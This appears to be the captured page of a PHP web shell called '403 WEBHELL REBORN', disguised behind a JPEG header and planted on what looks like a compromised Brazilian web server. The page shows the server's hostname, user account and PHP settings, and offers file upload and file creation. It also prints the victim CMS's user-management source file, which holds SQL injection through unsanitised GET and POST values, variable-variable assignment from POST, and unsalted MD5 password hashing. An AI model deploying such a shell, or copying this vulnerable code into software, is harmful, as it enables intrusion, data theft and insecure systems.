ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64
User : farolpborg ( 1053)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/farolpborg/public_html/cms/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/farolpborg/public_html/cms/usuarios-form.php
<?
$Pagina = "Usuários";
$tabela = "usuarios";
include("_includes/cabecalho.php");

$op = $_GET['op'];
$id = $_GET['id'];

if($op == "editar"){ $optx = 'salvar'; } else { $optx = 'adicionar'; }

foreach($_POST as $key => $valor){
	$$key = addslashes($valor);
}

$f_senha       = md5($senha);
$nome          = remove_aspas($_POST['nome']);

$o_datahora    = $_POST['datahora'];
$n_datahora    = str_replace('/', '-', $o_datahora);
$datahor       = date('Y-m-d H:i:s', strtotime($n_datahora));

$cpobgt  = '<section class="formulario">';
$cpobgt .= '<h1 title="'.$Pagina.'"><span>'.$Pagina.'</span></h1>';
$cpobgt .= '<p>';
$cpobgt .= '<strong>Campo(s) vazio(s):</strong><br><br>';
$cpobgt .= '- Nome<br>';
$cpobgt .= '- E-mail';
$cpobgt .= '</p>';
$cpobgt .= '<div><div class="clearfix"><input type="submit" value="Voltar" name="<?=$optx;?>" onclick="history.back();"></div></div>';
$cpobgt .= '</section>';

if(isset($_POST['salvar'])){
    
    if($op == 'editar'){
        
        if(empty($nome) || empty($email)){

            $erro = true;
            include("_ui/alerts.php");

            echo $cpobgt;
            exit;
        }
        
		if(!empty($senha)){
			mysqli_query($conecta, "UPDATE $tabela SET senha='$f_senha' WHERE id='$id'");
		}
        
		mysqli_query($conecta, "UPDATE $tabela SET status='$status', nome='$nome', email='$email', descricao='$descricao' WHERE id='$id'");
        
        $sucesso_salvar = true;
        
        $atividade = $atividade_editar.$id;
    
    }
    
}

if(isset($_POST['adicionar'])){
        
    if(empty($nome) || empty($email) || empty($f_senha)){

        $erro = true;
        include("_ui/alerts.php");

        echo $cpobgt;
        exit;
    }
    
    mysqli_query($conecta, "INSERT INTO $tabela (datahora, status, nome, email, senha, descricao) VALUES ('".date('Y-m-d H:i:s')."', '$status', '$nome', '$email', '$f_senha', '$descricao')");

    $id = mysqli_insert_id($conecta);
    
    $sucesso_adicionar = true;

    $atividade = $atividade_adicionar.$id;

}

if($op == 'ativar'){

    mysqli_query($conecta, "UPDATE $tabela SET status='1' WHERE id='$id'");

    $atividade = $atividade_ativar.$id;

    echo '<script type="text/javascript">document.location="'.$UrlCms.'/'.$tabela.'";</script>';

}

if($op == 'desativar'){

    mysqli_query($conecta, "UPDATE $tabela SET status='0' WHERE id='$id'");

    $atividade = $atividade_desativar.$id;

    echo '<script type="text/javascript">document.location="'.$UrlCms.'/'.$tabela.'";</script>';

}

if($op == 'deletar'){
    
    @unlink($imagem_dir."/big_".$resdel->imagem);
    
    mysqli_query($conecta, "DELETE FROM $tabela WHERE id='$id'");
    
    $atividade = $atividade_deletar.$id;
    
    echo '<script type="text/javascript">document.location="'.$UrlCms.'/'.$tabela.'";</script>';

}

if($op != 'ativar' && $op != 'desativar' && $op != 'deletar'){
    include("_ui/registros.php");
}

$sql = mysqli_query($conecta, "SELECT * FROM $tabela WHERE id='$id'");
$res = mysqli_fetch_object($sql);

include("_ui/alerts.php");
?>

<form method="post" action="" enctype="multipart/form-data">
<input name="id" type="hidden" value="<?=$id;?>">
<section class="formulario">
    <h1 title="<?=$Pagina;?>"><span><?=$Pagina;?></span></h1>
    <? if($op == "editar"){ ?>
    <div>
        <label for="">Data de registro</label>
        <div class="clearfix cbx">
            <?=formata_datahora($res->datahora);?>
        </div>
    </div>
    <? } ?>
    <div>
        <label for="">Ativar?</label>
        <div class="clearfix cbx">
            <input type="checkbox" name="status" id="status" value="1"<? if($res->status == 1 || $op != "editar"){ ?> checked="checked"<? } ?>> <label for="status">Marcar para ativar</label><br>
        </div>
    </div>
    <div>
        <label for="nome">Nome</label>
        <div class="clearfix">
            <input type="text" name="nome" id="nome" value="<?=$res->nome;?>">
        </div>
    </div>
    <div>
        <label for="email">E-mail</label>
        <div class="clearfix">
            <input type="text" name="email" id="email" value="<?=$res->email;?>">
            <small>Ex.: email@email.com</small>
        </div>
    </div>
    <div>
        <label for="senha">Senha</label>
        <div class="clearfix">
            <input type="password" name="senha" id="senha" class="nse">
            <i class="zmdi zmdi-eye-off omp"></i>
            <small>Senha entre 9 e 15 caracteres, com letras e números</small>
        </div>
    </div>
    <div>
        <label for="descricao">Descrição</label>
        <div class="clearfix">
            <textarea name="descricao" id="descricao"><?=stripslashes($res->descricao);?></textarea>
        </div>
    </div>
    <div>
        <div class="clearfix">
            <input type="submit" name="<?=$optx;?>" value="<?=$optx;?>"> <a href="<?=$UrlCms;?>/<?=$tabela;?>">Voltar</a>
        </div>
    </div>
</section>
</form>

<?
include("_includes/rodape.php");
?>

Anon7 - 2021